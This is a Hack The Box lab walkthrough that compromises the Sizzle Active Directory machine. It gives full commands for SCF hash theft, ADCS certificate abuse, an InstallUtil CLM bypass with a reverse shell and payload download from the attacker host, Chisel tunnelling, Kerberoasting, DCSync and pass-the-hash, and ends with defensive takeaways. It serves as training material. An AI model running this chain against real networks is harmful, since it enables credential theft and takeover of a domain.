Sizzle | Hack The Box Walkthrough | OSCP Style
Modern Active Directory environments are heavily layered. Bypassing perimeter defenses often means navigating through restricted execution…
Modern Active Directory environments are heavily layered. Bypassing perimeter defenses often means navigating through restricted execution environments, hidden internal services, and complex certificate chains. In this writeup, we will walk through the compromise of the Sizzle machine. We’ll cover SMB ACL enumeration to execute an SCF hash theft attack, abusing an internal Certificate Authority (ADCS) to gain WinRM SSL access, bypassing PowerShell Constrained Language Mode (CLM) using LOLBAS, pivoting internal Kerberos traffic with Chisel, and finally executing a DCSync attack for total domain compromise.
Let’s break down the attack path step by step.
Reconnaissance
We initiate our external reconnaissance with a comprehensive TCP port scan against the target IP.
sudo nmap -p- --open -sS -sV -sC --min-rate 5000 -vvv -n 10.10.10.103 -oN result.txt

The scan reveals SMB (139/445), WinRM (5985), and IIS web services (80/443), but interestingly, Kerberos (88) is missing from the external perimeter. We begin our enumeration by probing SMB shares using a dummy username to check for anonymous or guest access.
smbmap -H 10.10.10.103 -u 'prueba'
smbmap -H 10.10.10.103 -u 'prueba' -r 'Department Shares/Users'

We find access to Department Shares. To facilitate deeper enumeration, we mount the share locally:
sudo mount -t cifs "//10.10.10.103/Department Shares" /mnt/montura
tree -fast


Mapping the directory structure is not enough; we need to understand our privileges. Using smbcacls, we script a quick ACL (Access Control List) enumeration to find directories where Everyone has write access.
for directory in $(ls); do echo -e "\n[+] Enumerando permisos en el directorio $directory:\n"; echo -e "\t$(smbcacls "//10.10.10.103/Department Shares" Users/$directory -N | grep "Everyone")"; done

We discover full permissions on the Users/public folder.

This write access allows us to execute an SCF (Shell Command File) Attack. By dropping a malicious .scf file into a shared folder, we can force the Windows Explorer of any user who browses that directory to attempt an NTLM authentication to our rogue SMB server in order to fetch an icon.
We create the payload (@pentestlab.scf):
[Shell]
Command=2
IconFile=\\10.10.14.2\crypto\pentestlab.ico
[Taskbar]
Command=ToggleDesktop

We start Responder or an Impacket SMB server to catch the callback:
impacket-smbserver crypto . -smb2support

Once a user interacts with the share, we capture the NTLMv2 hash, which we crack offline using Hashcat:
hashcat -a 0 -m 5600 hash.txt /usr/share/wordlists/rockyou.txt --force

Credentials obtained: amanda : Ashare1972
Active Directory Certificate Services (ADCS)
We validate the credentials using crackmapexec:
crackmapexec smb 10.10.10.103 -u 'amanda' -p 'Ashare1972'

Standard WinRM over HTTP (5985) fails. To uncover additional vectors, we fuzz the IIS web service directories using wfuzz and the SecLists IIS.fuzz.txt wordlist:
wfuzz -c --hc=404 -t 200 -w IIS.fuzz.txt "http://10.10.10.103/FUZZ"

We discover the /certsrv/ endpoint, confirming the presence of an internal Certificate Authority (ADCS). Logging in with amanda's credentials allows us to request a new certificate.
To authenticate via WinRM over SSL (WinRM-HTTPS), we need a valid client certificate. We generate a private key and a Certificate Signing Request (CSR) using openssl:


openssl req -newkey rsa:2048 -nodes -keyout amanda.key -out amanda.csr

We submit the contents of amanda.csr to the web interface using the "User" certificate template and download the signed certificate (certnew.cer).



We can now establish a secure WinRM session:
evil-winrm -S -c certnew.cer -k amanda.key -i 10.10.10.103 -u 'amanda' -p 'Ashare1972'

Constrained Language Mode (CLM) Bypass
Upon gaining our shell, a quick local port check (netstat -nat) reveals that Kerberos (88) and LDAP (389) are running, but strictly bound to local interfaces.

When attempting to load PowerShell scripts into memory (like SharpHound[.]ps1), we encounter a severe error.

Checking our session state confirms we are trapped in Constrained Language Mode (CLM):
$ExecutionContext.SessionState.LanguageMode

CLM severely restricts the execution of arbitrary scripts and .NET methods. To bypass this, we leverage a LOLBAS (Living Off the Land Binaries and Scripts) technique using InstallUtil.exe, a legitimate Microsoft binary that can execute unmanaged code and bypass AppLocker/CLM policies. We upload a compiled bypass executable (PsBypassCLM[.]exe):
iwr -uri hxxp://10.10.14.2/PsBypassCLM[.]exe -OutFile PsBypassCLM[.]exe

We execute it via InstallUtil.exe to trigger a reverse shell back to our netcat listener in FullLanguage mode:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.14.2 /rport=9292 /U C:\windows\temp\recon\PsBypassCLM[.]exe

Port Forwarding and Remote Kerberoasting
With a full-featured shell, we upload the compiled SharpHound[.]exe (since the .ps1 version faced compatibility issues) and generate our BloodHound data:
.\SharpHound[.]exe

We exfiltrate the .zip file by mounting a local Impacket SMB share and copying the file over:
net use x: \\10.10.14.2\crypto /user:crypto crypto123
copy 20240415003941_BloodHound.zip x:\BloodHound.zip


Analysis in BloodHound reveals that the user mrlky is vulnerable to Kerberoasting. However, because Kerberos (port 88) is blocked externally, we cannot run Impacket tools from our Kali machine directly.

To bridge this gap, we upload chisel[.]exe to Sizzle and create a reverse port-forwarding tunnel, exposing internal ports 88 (Kerberos) and 389 (LDAP) to our attacker infrastructure:
chisel server --reverse --port 9999

.\chisel[.]exe client 10.10.14.2:9999 R:88:127.0.0.1:88 R:389:127.0.0.1:389

With the tunnel established, we route GetUserSPNs.py through our localhost, successfully extracting the TGS ticket for mrlky:
impacket-GetUserSPNs htb.local/amanda:Ashare1972 -request -dc-ip 127.0.0.1

We crack the Kerberos ticket offline using Hashcat:
hashcat -a 0 -m 13100 hash-kerberos.txt /usr/share/wordlists/rockyou.txt --force

Credentials obtained: mrlky : Football#7
DCSync and Domain Admin
Returning to BloodHound, we observe that mrlky has DS-Replication-Get-Changes and DS-Replication-Get-Changes-All privileges over the domain.


These permissions allow us to perform a DCSync attack, masquerading as a Domain Controller to request password hashes via the Directory Replication Service (DRS) protocol. We use CrackMapExec to execute the DCSync and dump the NTDS.dit:
crackmapexec smb 10.10.10.103 -u 'mrlky' -p 'Football#7' --ntds

With the Administrator NTLM hash secured, we achieve our final objective using Pass-the-Hash via impacket-psexec to obtain a SYSTEM shell:
impacket-psexec administrator@10.10.10.103 -hashes 'aad3b435b51404eeaad3b435b51404ee:f6b7160bfc91823792e0ac3a162c9267'

Conclusion
Sizzle is a fantastic, realistic box. The foothold mirrors how real intrusions often begin, not with a service exploit, but with OSINT and an exposed internal share allowing file drops. The rest is a masterclass in modern Active Directory pivoting: abusing ADCS templates to bypass authentication blocks, escaping strict Constrained Language Mode using LOLBAS, tunnelling Kerberos traffic through firewalls to perform Kerberoasting, and finally leveraging excessive AD permissions for a DCSync. Each step required understanding the underlying protocols; chained together, they meant full domain compromise.
Key takeaways:
- Audit SMB Permissions: Write access to public shares enables rapid hash theft via SCF/LNK files. Restrict write permissions strictly to necessary service accounts.
- Secure ADCS Configurations: Certificate Authorities are tier-0 assets. Ensure enrollment permissions are tightly controlled to prevent attackers from minting valid certificates for arbitrary authentication.
- Monitor LOLBAS Executions: Constrained Language Mode is a strong defense, but it falls apart if utilities like
InstallUtil.exeorMSBuild.exeare allowed to execute unmanaged code. Implement robust Windows Defender Application Control (WDAC). - Alert on Anomalous DRS Traffic: DCSync attacks simulate Domain Controllers. Any replication requests originating from a workstation IP (instead of an authorized DC) should trigger an immediate critical alert.
References
- PentestLab: SMB Share SCF File Attacks
- SecLists: IIS Fuzzing
- PSByPassCLM by padovah4ck
- Ghostpack Compiled Binaries
If you’re interested in following my upcoming articles on OT/ICS, certifications, HTB content, and Red Team experiences, I invite you to connect with me on LinkedIn or Instagram.